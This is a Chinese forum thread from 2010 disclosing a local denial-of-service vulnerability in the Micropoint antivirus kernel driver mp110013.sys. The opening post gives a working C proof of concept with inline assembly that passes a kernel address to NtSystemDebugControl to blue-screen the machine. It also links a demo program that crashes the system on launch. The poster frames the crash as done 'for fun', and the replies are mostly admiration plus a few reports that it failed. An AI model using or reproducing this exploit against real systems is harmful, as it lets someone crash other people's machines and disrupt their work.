微点主动防御mp110013.sys <= 1.3.10123.0 NtSystemDebugControl 本地拒绝服务漏洞

显示全部楼层 · 发表于 2010-4-6 20:19:30

产品版本：微点主动防御：mp.100323.1.2.10581.0278.r1
文件版本：mp110013.sys 1.3.10123.0 timestamp:4BA1863F checksum 1e7b8
问题：没有正确处理NtSystemDebugControl WriteVirtual/WritePhysical 中的 Address/Buffer成员，引发拒绝服务漏洞

测试程序：http://mj0011.ys168.com 漏洞演示目录下 mpbsod_fun_2.rar,运行后系统即崩溃
typedef struct _SYSDBG_VIRTUAL {
PVOID Address;
PVOID Buffer;
ULONG Request;
} SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL;
int main(int argc, char* argv[])
{
printf("Micropoint Local D.O.S Vulnerability\n"
"BSOD Micropoint for fun!\n"
"By MJ0011\nth_decoder$126.com\n\nPress Enter...\n");
getchar();
SYSDBG_VIRTUAL sbv ;
sbv.Address = (PVOID)0x80000000;
PVOID pAddr = GetProcAddress(GetModuleHandle("ntdll.dll") , "NtSystemDebugControl");
__asm
{
push 0
push 0
push 0
lea eax , sbv
push eax
push 0xb
call pAddr
}
return 0;
}

显示全部楼层 · 发表于 2010-4-6 20:26:50

哇，楼主真厉害呀

显示全部楼层 · 发表于 2010-4-6 20:27:46

卖糕的，你不好好玩你的事，又出来做这事情了

显示全部楼层 · 发表于 2010-4-6 20:28:21

没事调戏一下微点~ 娱乐娱乐

显示全部楼层 · 发表于 2010-4-6 20:41:20

我晕啊

显示全部楼层 · 发表于 2010-4-6 21:18:19

显示全部楼层 · 发表于 2010-4-6 23:58:44

过来看下牛人

显示全部楼层 · 发表于 2010-4-7 00:19:28

向牛人学习

显示全部楼层 · 发表于 2010-4-11 20:09:26

但是。偶运行了，结果什么都没发生啊。。

显示全部楼层 · 发表于 2010-4-12 23:59:31

有点搞笑的是我运行后弹出一个窗口：

mj能否解释一下。

[微点] 微点主动防御mp110013.sys <= 1.3.10123.0 NtSystemDebugControl 本地拒绝服务漏洞

评分

浏览过的版块